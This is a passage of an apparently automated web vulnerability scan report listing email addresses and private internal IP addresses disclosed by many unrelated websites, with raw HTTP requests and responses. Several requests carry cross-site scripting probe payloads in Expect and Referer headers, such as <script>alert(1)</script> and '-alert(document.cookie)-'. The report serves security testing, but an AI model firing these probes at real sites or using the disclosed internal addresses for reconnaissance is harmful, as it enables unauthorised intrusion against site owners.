Host:	http://www.infospaceinc.com
Path:	/contactus.aspx

Issue detail

The following email address was disclosed in the response:

Stacy.Ybarra@infospace.com

Request

GET /contactus.aspx HTTP/1.1
Host: www.infospaceinc.com
Proxy-Connection: keep-alive
Referer: http://www.infospaceinc.com/ourstory/leadership.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=158734690.1301677345.1.1.utmcsr=dogpile.com|utmccn=(referral)|utmcmd=referral|utmcct=/dogpile_rss/ws/about/_iceUrlFlag=11; __utma=158734690.1948383070.1301677345.1301677345.1301677345.1; __utmc=158734690; __utmb=158734690.12.10.1301677345

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:12:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<meta http-equiv="C
...[SNIP]...
<a href="mailto:Stacy.Ybarra@infospace.com" class="chevron">
...[SNIP]...

13.23. http://www.metapress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metapress.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

support@metapress.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.metapress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Connection: close
Date: Fri, 01 Apr 2011 17:10:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html

<HTML><BODY><H3>403 Forbidden</H3><I>ErrorId: 50066a26-84aa-4afa-95f9-e7e80507d685</I><p>Please contact <a href="mailto:support@metapress.com">support@metapress.com</a> if this problem persists.</p></
...[SNIP]...

13.24. http://www.my-junior-sister.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.my-junior-sister.net
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.my-junior-sister.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:12:58 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9
Content-Type: text/html; charset=iso-8859-1
Content-Length: 506

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

13.25. http://www.mycountdown.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mycountdown.org
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

contact@enclick.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycountdown.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:48:53 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 495
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:contact@enclick.com">
...[SNIP]...

13.26. http://www.net-temps.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.net-temps.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@net-temps.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.net-temps.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 17:09:53 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/5.2.9 mod_jk/1.2.28
Content-Length: 545
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@net-temps.com">
...[SNIP]...

13.27. http://www.noaawatch.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.noaawatch.gov
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

noaa.web.edge@noaa.gov

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.noaawatch.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation Failed
Server: squid
Mime-Version: 1.0
Date: Fri, 01 Apr 2011 15:57:40 GMT
Content-Type: text/html
Content-Length: 3751
X-Squid-Error: ERR_INVALID_REQ 0
Vary: Accept-Language
Content-Language: en
Via: 1.0 c7.w2.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>ERROR: The requested
...[SNIP]...
<a href="mailto:noaa.web.edge@noaa.gov?subject=CacheErrorInfo%20-%20ERR_INVALID_REQ&body=CacheHost%3A%20c7.w2.woc%0D%0AErrPage%3A%20ERR_INVALID_REQ%0D%0AErr%3A%20%5Bnone%5D%0D%0ATimeStamp%3A%20Fri,%2001%20Apr%202011%2015%3A57%3A40%20GM
...[SNIP]...
%20OpenSSL%2F0.9.8o%20zlib%2F1.2.3%0D%0AHost%3A%20www.noaawatch.gov%0D%0AAccept%3A%20*%2F*%0D%0AProxy-Connection%3A%20Keep-Alive%0D%0AExpect%3A%20%3Cscript%3Ealert(1)%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A">noaa.web.edge@noaa.gov</a>
...[SNIP]...

13.28. http://www.outspark.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outspark.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

noc@outspark.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outspark.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:06:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 493
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:noc@outspark.com">
...[SNIP]...

13.29. http://www.overtons.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.overtons.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@overtons.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.overtons.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 15:44:34 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 515
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@overtons.com">
...[SNIP]...

13.30. http://www.palomar.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.palomar.edu
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

cnorcross@palomar.edu

Request

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:27:44 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4614

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<a href="mailto:cnorcross@palomar.edu">
cnorcross@palomar.edu</a>
...[SNIP]...
<a href="mailto:cnorcross@palomar.edu">
...[SNIP]...

13.31. http://www.progressiveagent.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.progressiveagent.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@progressive.com

Request

Response

13.32. http://www.quartalflife.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quartalflife.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@flife.de

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quartalflife.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Fri, 01 Apr 2011 15:28:51 GMT
Content-Type: text/html
Content-Length: 1403
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from pro3.flife.de
Via: 1.0 pro3.flife.de:3128 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:webmaster@flife.de">webmaster@flife.de</A>
...[SNIP]...

13.33. http://www.quickyellow.com/scripts/v3/js/jquery.colorbox-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quickyellow.com
Path:	/scripts/v3/js/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /scripts/v3/js/jquery.colorbox-min.js HTTP/1.1
Host: www.quickyellow.com
Proxy-Connection: keep-alive
Referer: http://www.quickyellow.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=61172381; CFTOKEN=21256190; LOCATION.CITY=Sioux%20Falls; LOCATION.STATE=SD; LOCATION.COUNTRY=US; LOCATION.URL=sioux%5Ffalls%2Dsd

Response

HTTP/1.1 200 OK
Content-Length: 9191
Content-Type: application/x-javascript
Content-Location: http://www.quickyellow.com/scripts/v3/js/jquery.colorbox-min.js
Last-Modified: Mon, 20 Dec 2010 20:55:20 GMT
Accept-Ranges: bytes
ETag: "cb377a3688a0cb1:20f9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 18:10:55 GMT

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";func
...[SNIP]...

13.34. http://www.stvid.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stvid.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stvid.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:23:04 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8
Content-Length: 523
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@advancedhosters.com">
...[SNIP]...

13.35. http://www.ucsc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ucsc.edu
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

www-admin@ucsc.edu

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ucsc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:38:02 GMT
Server: Apache
Content-Length: 491
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:www-admin@ucsc.edu">
...[SNIP]...

13.36. http://www.viagra.com/common/js/lib/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.viagra.com
Path:	/common/js/lib/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /common/js/lib/s_code.js HTTP/1.1
Host: www.viagra.com
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 36555
Content-Type: application/x-javascript
Last-Modified: Fri, 21 Jan 2011 17:58:38 GMT
Accept-Ranges: bytes
ETag: "af0afd494b9cb1:313"
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:28:08 GMT

.../* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

13.37. http://www.viagra.com/common/swf/js/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.viagra.com
Path:	/common/swf/js/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /common/swf/js/s_code.js HTTP/1.1
Host: www.viagra.com
Proxy-Connection: keep-alive
Referer: http://www.viagra.com/favicon.ico?92bef'-alert(document.cookie)-'af112dd110f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 36554
Content-Type: application/x-javascript
Last-Modified: Fri, 21 Jan 2011 17:59:04 GMT
Accept-Ranges: bytes
ETag: "72fc13e494b9cb1:313"
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:28:05 GMT

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

13.38. http://www.wsaz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wsaz.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

news@wsaz.com

Request

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Server-Name: dv-c1-r2-u24-b2
Content-Type: text/html;charset=utf-8
Date: Fri, 01 Apr 2011 16:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
X-N: S
Content-Length: 43464

<script type="text/javascript">

</script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/1999/RE
...[SNIP]...
<a href="mailto:news@wsaz.com?subject=Story%20Idea">news@wsaz.com</a>
...[SNIP]...

14. Private IP addresses disclosed previous next
There are 15 instances of this issue:

http://manhattan.ny1.com/content/top_stories/
http://static.ak.connect.facebook.com/connect.php/en_US
http://www.allforgold.com/favicon.ico
http://www.consolelegends.com/favicon.ico
http://www.holidayscentral.com/favicon.ico
http://www.jobtarget.com/favicon.ico
http://www.jpcycles.com/favicon.ico
http://www.la-z-boy.com/favicon.ico
http://www.ny1.com/favicon.ico
http://www.ny1.com/favicon.ico
http://www.psasurveys.com/favicon.ico
http://www.pscufs.com/favicon.ico
http://www.queerty.com/favicon.ico
http://www.thoughtprojects.com/favicon.ico
http://www.tvseriesfinale.com/favicon.ico

14.1. http://manhattan.ny1.com/content/top_stories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/content/top_stories/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.11.12.223

Request

GET /content/top_stories/ HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:07:40 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 86182
Cache-Control: public, max-age=341
Expires: Fri, 01 Apr 2011 18:16:31 GMT
Date: Fri, 01 Apr 2011 18:10:50 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - - NY1.com
</title><me
...[SNIP]...
<span id="ctl00_lblServerInfo" class="hideOnPrint" style="color:White;background-color:White;">10.11.12.223</span>
...[SNIP]...

14.2. http://static.ak.connect.facebook.com/connect.php/en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.212.110

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dinsideup.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.insideup.com%252Findex.html%26extra_2%3DUS
If-None-Match: "aaa161bf0cde29b46085ebd0dfa15de0"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "f3f36f3cb4947cf46efb09c7be627988"
X-FB-Server: 10.32.212.110
X-Cnection: close
Content-Length: 18453
Vary: Accept-Encoding
Cache-Control: public, max-age=528
Expires: Fri, 01 Apr 2011 18:23:57 GMT
Date: Fri, 01 Apr 2011 18:15:09 GMT
Connection: close

/*1301528152,169923694,JIT Construction: v360100,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

14.3. http://www.allforgold.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allforgold.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.35.80

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allforgold.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1707770151
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:32:05 GMT
Via: 1.1 varnish 172.17.35.80
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

14.4. http://www.consolelegends.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.consolelegends.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.66.87

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.consolelegends.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2704611328
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:21:08 GMT
Via: 1.1 varnish 172.17.66.87
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

14.5. http://www.holidayscentral.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.holidayscentral.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.35.41

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.holidayscentral.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 3880211471
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:24:34 GMT
Via: 1.1 varnish 172.17.35.41
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

14.6. http://www.jobtarget.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jobtarget.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.50.5.54

Request

Response

14.7. http://www.jpcycles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpcycles.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.223.1

Request

Response

14.8. http://www.la-z-boy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.la-z-boy.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.13.61

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.la-z-boy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:24:40 GMT
SOURCE_ADDRESS: 192.168.13.61

14.9. http://www.ny1.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.11.12.223

Request

Response

14.10. http://www.ny1.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.11.12.232

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ny1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 15:46:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56245
Vary: Accept-Encoding
Cache-Control: public, max-age=585
Expires: Fri, 01 Apr 2011 15:56:46 GMT
Date: Fri, 01 Apr 2011 15:47:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
